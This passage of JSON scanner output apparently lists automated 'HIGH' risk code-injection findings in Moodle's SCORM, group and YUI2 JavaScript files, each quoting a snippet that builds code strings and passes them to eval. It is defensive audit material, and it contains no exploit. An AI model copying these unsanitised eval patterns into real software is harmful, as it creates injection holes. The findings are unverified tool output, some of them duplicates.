((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'w') {\n\n element = String(element).replace(/\\.(\\d+)\\./, \".N$1.\");\n element = element.replace(/\\.(\\d+)\\./, \".N$1.\");\n\n", "vulnerId": "APPCUT:62:14312", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 383, "positionInEndLine": 86, "startLineNumber": 383, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " adl.nav = new Object();\n adl.nav.request_valid = new Array();\n\n for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n", "vulnerId": "APPCUT:62:14309", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 255, "positionInEndLine": 94, "startLineNumber": 255, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " errorCode = \"351\";\n diagnostic = \"Data Model Element ID Already Exists\";\n }\n break;\n case 'cmi.interactions.n.type':\n var subobject = eval(subelement);\n subobject.correct_responses = new Object();\n subobject.correct_responses._count = 0;\n break;\n case 'cmi.interactions.n.learner_response':\n if (typeof eval(subelement + '.type') == \"undefined\") {\n", "vulnerId": "APPCUT:62:14324", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 68, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 653, "positionInEndLine": 80, "startLineNumber": 653, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " } else {\n errorCode = \"201\";\n }\n } else if (elementmodel.substr(elementmodel.length - countstr.length,elementmodel.length) == countstr) {\n parentmodel = elementmodel.substr(0,elementmodel.length - countstr.length);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + parentmodel + '\"]')) != \"undefined\") {\n errorCode = \"203\";\n } else {\n errorCode = \"201\";\n }\n } else {\n", "vulnerId": "APPCUT:62:14321", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 280, "positionInEndLine": 93, "startLineNumber": 280, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " case 'cmi.interactions.n.objectives.n.id':\n if (typeof eval(parentelement) != \"undefined\") {\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n }\n } else {\n errorCode = \"351\";\n diagnostic = \"Data Model Element ID Already Exists\";\n }\n", "vulnerId": "APPCUT:62:14322", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 64, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 564, "positionInEndLine": 97, "startLineNumber": 564, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if (autocommit && !(SCORMapi1_3.timeout)) {\n SCORMapi1_3.timeout = Y.later(60000, API_1484_11, 'Commit', [\"\"], false);\n }\n\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range')) != \"undefined\") {\n range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if (value >= ranges[0]) {\n if ((ranges[1] == '*') || (value <= ranges[1])) {\n eval(element + '=value;');\n", "vulnerId": "APPCUT:62:14310", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 753, "positionInEndLine": 108, "startLineNumber": 753, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (subelement == element) {\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"LMSGetValue\", element, eval(element), 0);\n }\n return eval(element);\n } else {\n errorCode = \"0\"; // Need to check if it is the right errorCode\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].readerror');\n", "vulnerId": "APPCUT:62:14311", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 39, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 261, "positionInEndLine": 48, "startLineNumber": 261, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " }\n }\n }\n\n eval(cmiobj[scoid]);\n eval(cmiint[scoid]);\n\n if (cmi.core.lesson_status == '') {\n cmi.core.lesson_status = 'not attempted';\n }\n }\n", "vulnerId": "APPCUT:62:14318", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 12, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 159, "positionInEndLine": 27, "startLineNumber": 159, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if (subelement == element) {\n\n if ((typeof eval(subelement) != \"undefined\") && (eval(subelement) != null)) {\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"GetValue\", element, eval(element), 0);\n }\n return eval(element);\n } else {\n errorCode = \"403\";\n }\n", "vulnerId": "APPCUT:62:14323", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 72, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 401, "positionInEndLine": 81, "startLineNumber": 401, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n\n eval(cmiobj[scoid]);\n eval(cmiint[scoid]);\n eval(cmicommentsuser[scoid]);\n eval(cmicommentslms[scoid]);\n\n if (cmi.completion_status == '') {\n cmi.completion_status = 'not attempted';\n }\n }\n", "vulnerId": "APPCUT:62:14315", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 12, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 266, "positionInEndLine": 35, "startLineNumber": 266, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/group/clientlib.js", "code": " membersComboEl.removeChild(membersComboEl.firstChild);\n }\n }\n\n if (groupsComboEl && o.responseText) {\n var groups = eval(\"(\"+o.responseText+\")\");\n\n // Populate the groups list box.\n for (var i=0; i<groups.length; i++) {\n var optionEl = document.createElement(\"option\");\n optionEl.setAttribute(\"value\", groups[i].id);\n", "vulnerId": "APPCUT:62:14314", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 37, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 45, "positionInEndLine": 61, "startLineNumber": 45, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if (element != \"\") {\n var expression = new RegExp(CMIIndex,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format') != 'CMIFeedback') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n } else {\n // cmi.interactions.n.type depending format accept everything at this stage\n expression = new RegExp(CMIFeedback);\n }\n", "vulnerId": "APPCUT:62:14319", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 478, "positionInEndLine": 94, "startLineNumber": 478, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " eval(element + ' = \"\";');\n }\n }\n }\n\n eval(cmiobj[scoid]);\n\n if (cmi.core.lesson_status == '') {\n cmi.core.lesson_status = 'not attempted';\n }\n }\n", "vulnerId": "APPCUT:62:14316", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 12, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 166, "positionInEndLine": 27, "startLineNumber": 166, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n eval(subelement + '.correct_responses._count = 0;');\n }\n }\n", "vulnerId": "APPCUT:62:14308", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 345, "positionInEndLine": 92, "startLineNumber": 345, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " break;\n }\n } else {\n switch (elementmodel) {\n case 'cmi.objectives.n.id':\n if (eval(element) != value) {\n errorCode = \"351\";\n diagnostic = \"Write Once Violation\";\n }\n break;\n case 'cmi.interactions.n.objectives.n.id':\n", "vulnerId": "APPCUT:62:14317", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 641, "positionInEndLine": 66, "startLineNumber": 641, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 10, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " case 'cmi.objectives.n.id':\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n var subobject = eval(subelement);\n subobject.success_status = datamodel[scoid][\"cmi.objectives.n.success_status\"].defaultvalue;\n subobject.completion_status = datamodel[scoid][\"cmi.objectives.n.completion_status\"].defaultvalue;\n subobject.progress_measure = datamodel[scoid][\"cmi.objectives.n.progress_measure\"].defaultvalue;\n subobject.score = new Object();\n subobject.score._children = score_children;\n", "vulnerId": "APPCUT:62:14387", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 76, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 534, "positionInEndLine": 88, "startLineNumber": 534, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-json/yui2-json.js", "code": "\n // Ensure valid JSON\n if (_isSafe(s)) {\n // Eval the text into a JavaScript data structure, apply the\n // reviver function if provided, and return\n return _revive( eval('(' + s + ')'), reviver );\n }\n\n // The text is not valid JSON\n throw new SyntaxError('JSON.parse');\n}\n", "vulnerId": "APPCUT:62:14381", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 225, "positionInEndLine": 43, "startLineNumber": 225, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (scormdebugging) {\n LogAPICall(\"LMSSetValue\", element, value, errorCode);\n }\n return \"true\";\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n if (element == 'cmi.comments') {\n cmi.comments = cmi.comments + value;\n } else {\n", "vulnerId": "APPCUT:62:14380", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 371, "positionInEndLine": 121, "startLineNumber": 371, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-profiler/yui2-profiler.js", "code": " method,\n prototype;\n \n //if owner isn't an object, try to find it from the name\n if (!lang.isObject(owner)){\n owner = eval(name.substring(0, name.lastIndexOf(\".\")));\n }\n \n //get the method and prototype\n method = owner[funcName];\n prototype = method.prototype;\n", "vulnerId": "APPCUT:62:14372", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 408, "positionInEndLine": 70, "startLineNumber": 408, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " case 'cmi.interactions.n.learner_response':\n if (typeof eval(subelement + '.type') == \"undefined\") {\n errorCode = \"408\";\n } else {\n // Use cmi.interactions.n.type value to check the right dataelement format\n interactiontype = eval(subelement + '.type');\n var nodes = new Array();\n if (learner_response[interactiontype].delimiter != '') {\n nodes = value.split(learner_response[interactiontype].delimiter);\n } else {\n nodes[0] = value;\n", "vulnerId": "APPCUT:62:14383", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 74, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 662, "positionInEndLine": 96, "startLineNumber": 662, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if (errorCode == \"0\") {\n if (autocommit && !(AICCapi.timeout)) {\n AICCapi.timeout = Y.later(60000, API, 'LMSCommit', [\"\"], false);\n }\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range')) != \"undefined\") {\n range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if ((value >= ranges[0]) && (value <= ranges[1])) {\n eval(element + '=\"' + value + '\";');\n errorCode = \"0\";\n", "vulnerId": "APPCUT:62:14386", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 343, "positionInEndLine": 108, "startLineNumber": 343, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n var elementstring = '&' + underscore(element) + '=' + encodeURIComponent(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property] || eval('typeof(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue)') != typeof(data[property])) {\n datastring += elementstring;\n }\n } else {\n datastring += elementstring;\n }\n", "vulnerId": "APPCUT:62:14384", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 129, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1187, "positionInEndLine": 205, "startLineNumber": 1187, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-profiler/yui2-profiler-debug.js", "code": " method,\n prototype;\n \n //if owner isn't an object, try to find it from the name\n if (!lang.isObject(owner)){\n owner = eval(name.substring(0, name.lastIndexOf(\".\")));\n }\n \n //get the method and prototype\n method = owner[funcName];\n prototype = method.prototype;\n", "vulnerId": "APPCUT:62:14376", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 408, "positionInEndLine": 70, "startLineNumber": 408, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " } else {\n childrenstr = '._children';\n countstr = '._count';\n if (elementmodel.substr(elementmodel.length - childrenstr.length,elementmodel.length) == childrenstr) {\n parentmodel = elementmodel.substr(0,elementmodel.length - childrenstr.length);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + parentmodel + '\"]')) != \"undefined\") {\n errorCode = \"202\";\n } else {\n errorCode = \"201\";\n }\n } else if (elementmodel.substr(elementmodel.length - countstr.length,elementmodel.length) == countstr) {\n", "vulnerId": "APPCUT:62:14378", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 273, "positionInEndLine": 93, "startLineNumber": 273, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " datastring += CollectData(data[property],parent + '.' + property);\n } else {\n element = parent + '.' + property;\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n elementstring = '&' + underscore(element) + '=' + escape(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property]) {\n datastring += elementstring;\n", "vulnerId": "APPCUT:62:14375", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 493, "positionInEndLine": 86, "startLineNumber": 493, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n", "vulnerId": "APPCUT:62:14382", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 341, "positionInEndLine": 81, "startLineNumber": 341, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if (value >= ranges[0]) {\n if ((ranges[1] == '*') || (value <= ranges[1])) {\n eval(element + '=value;');\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"SetValue\", element, value, errorCode);\n }\n return \"true\";\n", "vulnerId": "APPCUT:62:14374", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 758, "positionInEndLine": 69, "startLineNumber": 758, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n if (elementIndexes[i + 1] > eval(subelement + '.' + elementIndex + '._count')) {\n errorCode = \"201\";\n }\n subelement = subelement.concat('.' + elementIndex + '_' + elementIndexes[i + 1]);\n i++;\n } else {\n", "vulnerId": "APPCUT:62:14379", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 72, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 310, "positionInEndLine": 117, "startLineNumber": 310, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (errorCode == \"0\") {\n if (autocommit && !(SCORMapi1_2.timeout)) {\n SCORMapi1_2.timeout = Y.later(60000, API, 'LMSCommit', [\"\"], false);\n }\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range')) != \"undefined\") {\n range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if ((value >= ranges[0]) && (value <= ranges[1])) {\n eval(element + '=value;');\n errorCode = \"0\";\n", "vulnerId": "APPCUT:62:14373", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 360, "positionInEndLine": 108, "startLineNumber": 360, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-json/yui2-json-debug.js", "code": "\n // Ensure valid JSON\n if (_isSafe(s)) {\n // Eval the text into a JavaScript data structure, apply the\n // reviver function if provided, and return\n return _revive( eval('(' + s + ')'), reviver );\n }\n\n // The text is not valid JSON\n throw new SyntaxError('JSON.parse');\n}\n", "vulnerId": "APPCUT:62:14385", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 225, "positionInEndLine": 43, "startLineNumber": 225, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 1, 